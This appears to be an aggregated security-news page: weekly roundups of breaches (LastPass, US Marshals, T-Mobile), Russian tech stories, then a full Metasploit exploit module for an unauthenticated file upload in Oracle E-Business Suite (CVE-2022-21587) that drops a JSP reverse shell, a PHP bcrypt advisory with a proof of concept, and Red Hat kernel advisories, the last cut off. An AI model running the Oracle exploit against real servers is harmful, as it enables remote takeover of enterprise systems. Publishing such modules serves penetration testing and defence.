Plus: The US Marshals disclose a “major” cybersecurity incident, T-Mobile has gotten pwned so much, and more.

Chinese hackers proved themselves to be as prolific and invasive as ever this week with new findings revealing that in February 2022, Beijing-backed hackers compromised the email server of the Association of Southeast Asian Nations, an intergovernmental body of 10 Southeast Asian countries. The security alert, first reported by WIRED, comes as China has escalated its hacking in the region amidst rising tensions.

Meanwhile, with Russia facing economic sanctions over its invasion of Ukraine, the Kremlin has been trying to address gaps in its tech sector. Now, we've learned, it's scrambling to get a home-brewed Android phone off the ground this year. The National Computer Corporation company, a Russian IT giant, says it will somehow produce and sell 100,000 smartphones and tablets by the end of 2023. Though Android is an open-source platform, there are steps Google could take to restrict the license for the new Russian phone that could ultimately force the project to seek a different mobile operating system.

At the Network and Distributed System Security Symposium in San Diego this week, researchers from Ruhr University Bochum and the CISPA Helmholtz Center for Information Security presented findings that popular DJI quadcopters communicate using unencrypted radio signals that can be intercepted to determine where the drones are, as well as the GPS coordinates of their operators. The researchers discovered the exposed communications by reverse engineering DJI's radio protocol, DroneID.

In the US, a long-awaited national cybersecurity plan from the White House finally debuted on Thursday. In focuses in part on familiar priorities like hardening defenses for critical infrastructure and and expanding efforts to disrupt cybercriminal activity. But the plan also includes a proposal to shift legal liability for vulnerabilities and security failures onto the companies who cause them, like software makers or institutions that don't make a reasonable effort to protect sensitive data.

If you want to do something good for your cyber hygiene this weekend, we've got a roundup of the most pressing software patches to download ASAP. Seriously, go install them now, we'll wait here.

And there's more. Each week, we round up the security news we didn’t cover in-depth ourselves. Click the headlines to read the full stories, and stay safe out there.

In December, the password-manager maker LastPass revealed that an August breach it had disclosed at the end of November was worse than the company originally thought, compromising encrypted copies of some users’ password vaults, on top of other personal information. Now, the company has disclosed a second incident that began in mid-August and allowed attackers to rampage through the company's cloud storage and exfiltrate sensitive data. Attackers gained such extraordinary access by targeting a specific LastPass employee with deep system privileges 

“This was accomplished by targeting \[a\] DevOps engineer’s home computer and exploiting a vulnerable third-party media software package, which enabled remote code execution capability and allowed the threat actor to implant keylogger malware,” LastPass wrote in an account of the situation. “The threat actor was able to capture the employee’s master password as it was entered, after the employee authenticated with MFA, and gain access to the DevOps engineer’s LastPass corporate vault.”

To target the LastPass employee, attackers exploited a Plex Media Server software vulnerability that had already been long-patched at the time. The company issued a fix for the bug in May 2020, “roughly 75 versions ago,” Plex said.

US law enforcement officials said on Monday that a stand-alone US Marshals Service network suffered a data exfiltration and ransomware attack in mid-February. “The affected system contains law enforcement sensitive information, including returns from legal process, administrative information, and personally identifiable information pertaining to subjects of USMS investigations, third parties, and certain USMS employees,” Marshals Service spokesperson Drew Wade said in a statement. The impacted data seemingly did not include information from the Witness Security Program or witness protection database. Nonetheless, Wade said that officials had “determined that it constitutes a major incident.”

Three cybercriminal groups that conduct SIM-swapping attacks have claimed that they repeatedly hacked T-Mobile last year as part of their scams. The groups would target T-Mobile employees with phishing attacks to gain access to internal company systems. Then they would sell this access to other cybercriminals to intercept individual T-Mobile customers’ SMS text messages and calls on attacker-controlled devices. The findings come from an analysis by Krebs on Security of Telegram chat activity of the three SIM-swapping gangs.

T-Mobile declined to confirm or deny the claims to Krebs on Security. “We have continued to drive enhancements that further protect against unauthorized access, including enhancing multi-factor authentication controls, hardening environments, limiting access to data, apps or services, and more,” the telecom said in a statement. “We are also focused on gathering threat intelligence data, like what you have shared, to help further strengthen these ongoing efforts.”

A bill filed last week in Texas by Representative Steve Toth would mandate that Texas internet service providers block websites that offer information about receiving abortion care. The bill would also outlaw domain registration and hosting for websites that help Texas residents obtain abortions, either through fundraising, procuring abortifacient drugs, or sharing resources. The proposal lists specific examples of websites that would have to be blocked, including aidaccess.org, heyjane.co, plancpills.org, mychoix.co, justthepill.com, and carafem.org.

The LastPass Hack Somehow Gets Worse

By Deeba Ahmed
Interestingly, Telegram is also part of this ban, although it is owned by Russian millionaire Pavel Durov.
This is a post from HackRead.com Read the original post: Russia Bans WhatsApp, Discord, Telegram, and Others

The Russian government has added a wide range of Western messaging apps to its Register of Prohibited Sites, including Snapchat, WhatsApp, Discord, Skype for Business, Microsoft Teams, and Telegram.

In addition, European encrypted messaging apps Viber and Threema, as well as the Chinese communication app WeChat, have also been banned.

According to a memo posted by a famous online library of hacked materials, such as source codes and malware, the Russian Federation has banned all Western social media and online messaging applications.

The complete list of banned apps includes the following:

1.  Viber
2.  Discord
3.  WeChat
4.  Snapchat
5.  Telegram
6.  Threema
7.  WhatsApp
8.  Microsoft Teams
9.  Skype for Business

The government has devised a new law on Information, Information Technologies, and Information Protection to ban these applications, which was formally implemented yesterday. The law is part of the Federal Service for Supervision of Communications, Information Technology, and Mass Media, aka **Roskomnadzor** (RKN).

Article 8-10 of **the new law** applies to government agencies and organizations and establishes a ban for several Russian organizations on using Western foreign messaging apps.

In a **statement**, Roskomnadzor said, “The law establishes a ban for a number of Russian organizations on the use of foreign messengers (information systems and computer programs owned by foreign persons that are designed and (or) used for exchanging messages exclusively between their users, in which the sender determines the recipients of messages and does not provide for placement by internet users publicly available information on the internet).”

It is worth noting that Zoom and Signal have not been added to the list, but they may be added to the Russian government’s infamous register sometime later. These restrictions are placed on government officials to minimize the possibility of sensitive data landing in the wrong hands, particularly to Ukraine’s allies. Or this could be part of a wider crackdown against foreign tech services in Russia.

Interestingly, Telegram is also part of this block list, even though it is owned by Russian millionaire Pavel Durov. This app is popular in Ukraine and in the western regions, which could be a reason for its blacklisting. App and site owners can file an appeal within a month before they are placed on the Register of Prohibited Sites; however, the appeal may be denied.

In 2018, the Russian administration formally **banned Telegram, 50+ VPNs and anonymizers** in the country and has already blocked hundreds of Western social networking platforms, such as Instagram and Facebook, as well as news platforms. There has also been a crackdown against the use of the Tor browser and VPNs.

*   **Germany bans kids’ smartwatches**
*   **US Military bans TikTok over privacy concerns**
*   **GoDaddy bans neo-nazi DailyStormer website**
*   **Why are Google and Facebook banned in China?**
*   **U.S bans Kaspersky software for links to Russia**

Russia Bans WhatsApp, Discord, Telegram, and Others

Amid isolating sanctions, a Russian tech giant plans to launch new Android phones and tablets. But experts are skeptical the company can pull it off.

The fresh wave of sanctions after the invasion of Ukraine has given new wind to the concept of technological self-sufficiency, with Russia’s government launching multiple initiatives to create domestic substitutes for foreign electronics, online platforms, and software, on which many Russian companies are dependent.

Over a thousand tech companies stopped or curtailed their operations in Russia after the invasion of Ukraine. In just a month, Cisco, SAP, Oracle, IBM, TSMC, Nokia, and Ericsson, as well as Samsung and Apple, left the market, affecting entire industries, including mobile operators, factories, startups, and large state-owned companies. According to IDC, a global market-analysis firm, the Russian IT market in 2022 shrank by $12.1 billion, or 39 percent.

Russian prime minister Mikhail Mishustin said in February that Russia wants to replace 85 percent of foreign software with Russian substitutes, opening dozens of so-called import substitution centers. Among them is a project to create a national operating system for devices. The plan, however, is at an early stage with no road map in sight, says the Internet Research Institute’s Kazaryan.

“Currently, a few big players are trying to woo the government for subsidies to create devices on ‘national mobile OS,’ whatever that might be,” he says.

One of the more promising alternatives to Android is Aurora OS, a Linux-based smartphone operating system made by the Russian state-owned telecommunications firm Rostelecom. But Aurora was primarily made for government use and does not support Android apps. In December, the Russian government refused to allocate any of the 22 billion rubles ($292.1 million) earmarked for the development of the Russian operating system.

Other Russian smartphone makers, such as BQ, have promised to adapt Huawei’s HarmonyOS for its handsets. But there's been no news of progress since BQ’s announcement in September. Huawei, which is based in China, developed its own operating system in 2019 after Google stopped providing its suite of mobile software services to the company because of US trade sanctions. The Chinese IT giant has said it has no plans to launch HarmonyOS-equipped mobile phones outside of China.

Huawei’s struggle to compete outside China shows that it’s hard for a smartphone brand to gain buyers without access to Google services. Huawei lost almost a third of its revenue in 2020, the year after sanctions cut its access to Google Maps, Gmail, and other common Google apps. The biggest hurdle NCC’s new smartphone may face, however, is cheap and readily available phones from China. 

Counterpoint’s data shows that phones from Xiaomi, Realme, and Honor, a budget brand previously owned by Huawei, have replaced once best-selling iPhones and Samsung Galaxy devices, accounting for 95 percent of the market last year.

“There's still a lot of competition,” says Counterpoint’s Stryjak. “I don't think there's a huge gap in the market for a new player.”

Other Russian phones, most famously Yotaphone, have tried to capture the domestic market, but they remained at a very small scale, says Stryjak. Russians prefer brands they already know. Thanks to parallel trading—importing goods without the permission of the manufacturer—even Samsungs and iPhones are still available in the country. NCC says it aims to price its smartphones between 10,000 and 30,000 rubles ($132 and $398). 

“We are considering various options. This could be production at Russian factories or contract manufacturing at Chinese enterprises,” NCC’s Kalinin told local media. NCC did not respond to WIRED’s request for comment.

Other Russian smartphone makers such as Smartekosistema, owned by state giant Rostec, have found that they were unable to procure the necessary chips from TSMC for the second iteration of their handset, the AYYA T2. All of this may make creating Russian challengers to Samsung or Apple very expensive.

“You probably can make a smartphone in Russia with Chinese parts, but it's not very efficient,” says Kazaryan. “And why would anyone buy a Russian phone that is more expensive than Xiaomi?”

The Sketchy Plan to Build a Russian Android Phone

This Metasploit module exploits an unauthenticated arbitrary file upload vulnerability in Oracle Web Applications Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in order to gain remote code execution as the oracle user.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##require 'rex/zip'class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::FileDropper  def initialize(info = {})    super(      update_info(        info,        'Name' => 'Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload',        'Description' => %q{          This module exploits an unauthenticated arbitrary file upload vulnerability in Oracle Web Applications          Desktop Integrator, as shipped with Oracle EBS versions 12.2.3 through to 12.2.11, in          order to gain remote code execution as the oracle user.        },        'Author' => [          'sf', # MSF Exploit & Rapid7 Analysis          'HMs', # Python PoC          'l1k3beef', # Original Discoverer        ],        'References' => [          ['CVE', '2022-21587'],          ['URL', 'https://attackerkb.com/topics/Bkij5kK1qK/cve-2022-21587/rapid7-analysis'],          ['URL', 'https://blog.viettelcybersecurity.com/cve-2022-21587-oracle-e-business-suite-unauth-rce/'],          ['URL', 'https://github.com/hieuminhnv/CVE-2022-21587-POC']        ],        'DisclosureDate' => '2022-10-01',        'License' => MSF_LICENSE,        'Platform' => %w[linux],        'Arch' => ARCH_JAVA,        'Privileged' => false, # Code execution as user 'oracle'        'Targets' => [          [            'Oracle EBS on Linux (OVA Install)',            {              'Platform' => 'linux',              'EBSBasePath' => '/u01/install/APPS/fs1/',              'EBSUploadPath' => 'EBSapps/appl/bne/12.0.0/upload/',              'EBSFormsPath' => 'FMW_Home/Oracle_EBS-app1/applications/forms/forms/'            }          ]        ],        'DefaultOptions' => {          'PAYLOAD' => 'java/jsp_shell_reverse_tcp'        },        'Notes' => {          'Stability' => [CRASH_SAFE],          'Reliability' => [REPEATABLE_SESSION],          'SideEffects' => [ARTIFACTS_ON_DISK, IOC_IN_LOGS]        }      )    )    register_options(      [        Opt::RPORT(8000)      ]    )  end  def check    res = send_request_cgi(      'method' => 'GET',      'uri' => '/OA_HTML/FrmReportData'    )    return CheckCode::Unknown('Connection failed') unless res    return CheckCode::Unknown unless res.code == 200    match = res.body.match(%r{jsLibs/Common(\d+_\d+_\d+)})    if match && (match.length == 2)      version = Rex::Version.new(match[1].gsub('_', '.'))      if version.between?(Rex::Version.new('12.2.3'), Rex::Version.new('12.2.11'))        return CheckCode::Appears("Oracle EBS version #{version} detected.")      end      return CheckCode::Safe("Oracle EBS version #{version} detected.")    end    CheckCode::Safe  end  def exploit    endpoints = %w[BneViewerXMLService BneDownloadService BneOfflineLOVService BneUploaderService]    target_url = "/OA_HTML/#{endpoints.sample}"    print_status("Targeting the endpoint: #{target_url}")    jsp_name = Rex::Text.rand_text_alpha_lower(3..8) + '.jsp'    jsp_path = '../' * target['EBSUploadPath'].split('/').length    jsp_path << "#{target['EBSFormsPath']}#{jsp_name}"    jsp_absolute_path = "#{target['EBSBasePath']}#{target['EBSFormsPath']}#{jsp_name}"    zip = Rex::Zip::Archive.new    zip.add_file(jsp_path, payload.encoded)    # The ZIP file is expected to be encoded with the binary to text encoding mechanism called uuencode.    # For a detailed description refer to the Rapid7 AttackerKB analysis in the References section of this module.    uue_data = "begin 777 #{Rex::Text.rand_text_alpha_lower(3..8)}.zip\n"    uue_data << [zip.pack].pack('u')    uue_data << "end\n"    uue_name = "#{Rex::Text.rand_text_alpha_lower(3..8)}.uue"    mime = Rex::MIME::Message.new    mime.add_part(uue_data, 'text/plain', nil, %(form-data; name="file"; filename="#{uue_name}"))    register_file_for_cleanup(jsp_absolute_path)    res = send_request_cgi(      {        'method' => 'POST',        'uri' => target_url,        'vars_get' => { 'bne:uueupload' => 'true' },        'encode_params' => true,        'ctype' => "multipart/form-data; boundary=#{mime.bound}",        'data' => mime.to_s      }    )    unless res && res.code == 200 && res.body.include?('bne:text="Cannot be logged in as GUEST."')      fail_with(Failure::UnexpectedReply, 'Failed to upload the payload')    end    print_status('Triggering the payload...')    send_request_cgi(      'method' => 'GET',      'uri' => "/forms/#{jsp_name}"    )  endend

Oracle E-Business Suite (EBS) Unauthenticated Arbitrary File Upload

In PHP 8.0.X before 8.0.28, 8.1.X before 8.1.16 and 8.2.X before 8.2.3, password_verify() function may accept some invalid Blowfish hashes as valid. If such invalid hash ever ends up in the password database, it may lead to an application allowing any password for this entry as valid.

**Summary**

Malformatted BCrypt hashes that include a $ within their salt part will trigger a buffer overread and may erroneously validate any password as valid.

**Details**

Example:

<?php
var\_dump(password\_verify("foo", '$2y$04$00000000$')); // bool(true)
?>

This issue is caused by a PHP specific modification to the crypt\_blowfish implementation that is fittingly named “PHP hack”:

if (tmp == '$') break; /\* PHP hack \*/ \\

The “hack” will allow a salt that is cut short by $ to be detected as valid and allowing it to proceed with the algorithm. At the end the original setting, which is properly NUL terminated, will be copied into the output buffer:

memcpy(output, setting, 7 + 22 - 1);

which is then used to initialize the returned zend_string by leveraging strlen() and thus cutting the string short after the setting:

result = zend\_string\_init(output, strlen(output), 0);

… thus returning the original input.

Furthermore a buffer overread of the setting input may be triggered when copying the setting into the output buffer, because the memcpy uses fixed sizes, even if the setting might be too short:

memcpy(output, setting, 7 + 22 - 1);

**Suggested Fix**

The suggested fix would be removing the “PHP Hack” and thus the differences between PHP's crypt\_blowfish and Openwall’s implementation which is the basis of PHP’s implementation.

The “PHP Hack” exists since the very first version of PHP’s own crypt\_blowfish implementation and no clear reasoning is given for its existence in the commentary or commit history. In any case such a hash is not a valid BCrypt hash and it is not generated by password_hash(), which is the recommended password hashing API in PHP.

While this technically might break backwards compatibility with existing users, the fact that these hashes are never generated by password_hash(), are not accepted by other implementations of BCrypt and introduce possible security vulnerabilities in applications, they should be rejected in every supported PHP version.

**PoC**

Running the following in valgrind:

<?php
var\_dump(password\_verify("foo", '$2y$04$00000000$')); // bool(true)
?>

results in:

    ==423829== Memcheck, a memory error detector
    ==423829== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
    ==423829== Using Valgrind-3.15.0 and LibVEX; rerun with -h for copyright info
    ==423829== Command: sapi/cli/php test3.php
    ==423829== 
    ==423829== Invalid read of size 2
    ==423829==    at 0x4840240: memcpy@GLIBC_2.2.5 (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==423829==    by 0x591BE9: BF_crypt (crypt_blowfish.c:763)
    ==423829==    by 0x591DAD: php_crypt_blowfish_rn (crypt_blowfish.c:830)
    ==423829==    by 0x5D76BC: php_crypt (crypt.c:143)
    ==423829==    by 0x68CC98: php_password_bcrypt_verify (password.c:157)
    ==423829==    by 0x68DD3C: zif_password_verify (password.c:635)
    ==423829==    by 0x7A58C1: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
    ==423829==    by 0x81F2AF: execute_ex (zend_vm_execute.h:55163)
    ==423829==    by 0x824B54: zend_execute (zend_vm_execute.h:59523)
    ==423829==    by 0x769201: zend_execute_scripts (zend.c:1694)
    ==423829==    by 0x6B0B56: php_execute_script (main.c:2545)
    ==423829==    by 0x869719: do_cli (php_cli.c:949)
    ==423829==  Address 0x704da90 is 0 bytes after a block of size 48 alloc'd
    ==423829==    at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==423829==    by 0x7286E6: __zend_malloc (zend_alloc.c:3056)
    ==423829==    by 0x726FFF: _malloc_custom (zend_alloc.c:2418)
    ==423829==    by 0x7271C0: _emalloc (zend_alloc.c:2537)
    ==423829==    by 0x840E4B: zend_string_alloc (zend_string.h:144)
    ==423829==    by 0x840EBE: zend_string_init (zend_string.h:166)
    ==423829==    by 0x841BCB: zend_new_interned_string_request (zend_string.c:245)
    ==423829==    by 0x72B5E9: zval_make_interned_string (zend_compile.c:514)
    ==423829==    by 0x72B664: zend_insert_literal (zend_compile.c:526)
    ==423829==    by 0x72B7EC: zend_add_literal (zend_compile.c:547)
    ==423829==    by 0x72FC82: zend_emit_op (zend_compile.c:2054)
    ==423829==    by 0x73380D: zend_compile_args (zend_compile.c:3516)
    ==423829== 
    ==423829== Invalid read of size 1
    ==423829==    at 0x591BF5: BF_crypt (crypt_blowfish.c:765)
    ==423829==    by 0x591DAD: php_crypt_blowfish_rn (crypt_blowfish.c:830)
    ==423829==    by 0x5D76BC: php_crypt (crypt.c:143)
    ==423829==    by 0x68CC98: php_password_bcrypt_verify (password.c:157)
    ==423829==    by 0x68DD3C: zif_password_verify (password.c:635)
    ==423829==    by 0x7A58C1: ZEND_DO_ICALL_SPEC_RETVAL_USED_HANDLER (zend_vm_execute.h:1295)
    ==423829==    by 0x81F2AF: execute_ex (zend_vm_execute.h:55163)
    ==423829==    by 0x824B54: zend_execute (zend_vm_execute.h:59523)
    ==423829==    by 0x769201: zend_execute_scripts (zend.c:1694)
    ==423829==    by 0x6B0B56: php_execute_script (main.c:2545)
    ==423829==    by 0x869719: do_cli (php_cli.c:949)
    ==423829==    by 0x86A950: main (php_cli.c:1337)
    ==423829==  Address 0x704da94 is 4 bytes after a block of size 48 alloc'd
    ==423829==    at 0x483B7F3: malloc (in /usr/lib/x86_64-linux-gnu/valgrind/vgpreload_memcheck-amd64-linux.so)
    ==423829==    by 0x7286E6: __zend_malloc (zend_alloc.c:3056)
    ==423829==    by 0x726FFF: _malloc_custom (zend_alloc.c:2418)
    ==423829==    by 0x7271C0: _emalloc (zend_alloc.c:2537)
    ==423829==    by 0x840E4B: zend_string_alloc (zend_string.h:144)
    ==423829==    by 0x840EBE: zend_string_init (zend_string.h:166)
    ==423829==    by 0x841BCB: zend_new_interned_string_request (zend_string.c:245)
    ==423829==    by 0x72B5E9: zval_make_interned_string (zend_compile.c:514)
    ==423829==    by 0x72B664: zend_insert_literal (zend_compile.c:526)
    ==423829==    by 0x72B7EC: zend_add_literal (zend_compile.c:547)
    ==423829==    by 0x72FC82: zend_emit_op (zend_compile.c:2054)
    ==423829==    by 0x73380D: zend_compile_args (zend_compile.c:3516)
    ==423829== 
    bool(true)
    ==423829== 
    ==423829== HEAP SUMMARY:
    ==423829==     in use at exit: 1,094 bytes in 20 blocks
    ==423829==   total heap usage: 15,723 allocs, 15,703 frees, 2,766,336 bytes allocated
    ==423829== 
    ==423829== LEAK SUMMARY:
    ==423829==    definitely lost: 0 bytes in 0 blocks
    ==423829==    indirectly lost: 0 bytes in 0 blocks
    ==423829==      possibly lost: 0 bytes in 0 blocks
    ==423829==    still reachable: 1,094 bytes in 20 blocks
    ==423829==         suppressed: 0 bytes in 0 blocks
    ==423829== Rerun with --leak-check=full to see details of leaked memory
    ==423829== 
    ==423829== For lists of detected and suppressed errors, rerun with: -s
    ==423829== ERROR SUMMARY: 3 errors from 2 contexts (suppressed: 0 from 0)
    

**Impact**

Applications that validate passwords with malformed or untrusted hashes might be affected by returning every password as valid for affected hashes.

CVE-2023-0567: BCrypt hashes erroneously validate if the salt is cut short by `$`

Sudo before 1.9.13p2 has a double free in the per-command chroot feature.

CVE-2023-27320: Stable Release

Red Hat Security Advisory 2023-0945-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:0945-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0945  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-4378   
=====================================================================

1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
7.7 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server E4S (v. 7.7) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.src.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.src.rpm

ppc64le:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_68_1-debuginfo-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.ppc64le.rpm  
kpatch-patch-3_10_0-1062_70_1-debuginfo-1-1.el7.ppc64le.rpm

x86_64:  
kpatch-patch-3_10_0-1062_68_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_68_1-debuginfo-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_70_1-1-1.el7.x86_64.rpm  
kpatch-patch-3_10_0-1062_70_1-debuginfo-1-1.el7.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-4378  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY/3zwNzjgjWX9erEAQgckw/7B9elFpmuesMfyPfX2TOojH8y3cplE1Bl  
MkYwIDtD1hsuQPs+CyAczXmybgFA2E+Lruldm9MI3qcyKkQDUjsKUTyO+OKqPQz/  
TgohO3q04tg/uEMGod96pcj5gn+/wddXzMH69tWLkAGlj+IS7vaj1zcCzpqoRkBL  
Ld4QCi4lAZcByXn8KZpcqT8SUJhhCHcSwJjgjBiiWlMuh1BQpTcnaOU+YSRUK7ox  
e/eRn3KzkXf0mEp648t6SLs74IFrmlgtswUGZYxRGVBZnm9U1hl8uIFOMZNeekKf  
TL2K+r2KwcFEOAr1q2oVaaqgNyr1r/P094rZqUtdah80gu8xnaH2nXV7pjOH2xy8  
oorD/XpbZyg6/3XZwKRGMVJkcyqBaUiNy9I85qi0kffk52rQWjP88TKPM9Nq5S2T  
ZkmLOgTNelWNsv10KwR87K+rg9+F+GlFTEtGwUOcmlLEVwd+cAJb6HAXJrBULXCA  
5WNQacQtJ4JQ6iSaZfNRDfsHk44cXzeSMpyKDqZUlaVsZaq4BtgHMRfnSNLnw1k1  
N2rsmA2Dp6+CHY4nStTOsFIqCqh7HHqVLxUxIoGegwTdzbD59EdCICiIOj9bUJDL  
62urASH/uAxCFMFPaAx2JefEZkwCzPYJVTxoejFnESSkkxJ5rIrxiz05HgNVkA/g  
SfHzKU8H41E=  
=xuoe  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-0945-01

Red Hat Security Advisory 2023-0944-01 - The kernel packages contain the Linux kernel, the core of any Linux operating system.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: kernel security update  
Advisory ID:       RHSA-2023:0944-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0944  
Issue date:        2023-02-28  
CVE Names:         CVE-2022-4378   
=====================================================================

1. Summary:

An update for kernel is now available for Red Hat Enterprise Linux 7.7  
Advanced Update Support, Red Hat Enterprise Linux 7.7 Telco Extended Update  
Support, and Red Hat Enterprise Linux 7.7 Update Services for SAP  
Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Server AUS (v. 7.7) - noarch, x86_64  
Red Hat Enterprise Linux Server E4S (v. 7.7) - noarch, ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional AUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server Optional E4S (v. 7.7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional TUS (v. 7.7) - x86_64  
Red Hat Enterprise Linux Server TUS (v. 7.7) - noarch, x86_64

3. Description:

The kernel packages contain the Linux kernel, the core of any Linux  
operating system.

Security Fix(es):

* kernel: stack overflow in do_proc_dointvec and proc_skip_spaces  
(CVE-2022-4378)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

The system must be rebooted for this update to take effect.

5. Bugs fixed (https://bugzilla.redhat.com/):

2152548 - CVE-2022-4378 kernel: stack overflow in do_proc_dointvec and proc_skip_spaces

6. Package List:

Red Hat Enterprise Linux Server AUS (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debuginfo-common-x86_64-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-headers-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-3.10.0-1062.71.1.el7.x86_64.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-3.10.0-1062.71.1.el7.x86_64.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm

Red Hat Enterprise Linux Server E4S (v. 7.7):

Source:  
kernel-3.10.0-1062.71.1.el7.src.rpm

noarch:  
kernel-abi-whitelists-3.10.0-1062.71.1.el7.noarch.rpm  
kernel-doc-3.10.0-1062.71.1.el7.noarch.rpm

ppc64le:  
bpftool-3.10.0-1062.71.1.el7.ppc64le.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-bootwrapper-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-debuginfo-common-ppc64le-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-devel-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-headers-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
kernel-tools-libs-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-3.10.0-1062.71.1.el7.ppc64le.rpm  
perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-3.10.0-1062.71.1.el7.ppc64le.rpm  
python-perf-debuginfo-3.10.0-1062.71.1.el7.ppc64le.rpm

x86_64:  
bpftool-3.10.0-1062.71.1.el7.x86_64.rpm  
bpftool-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-debuginfo-3.10.0-1062.71.1.el7.x86_64.rpm  
kernel-debug-devel-3.10.0-1062.71.1.el7.x86_64.rpm  
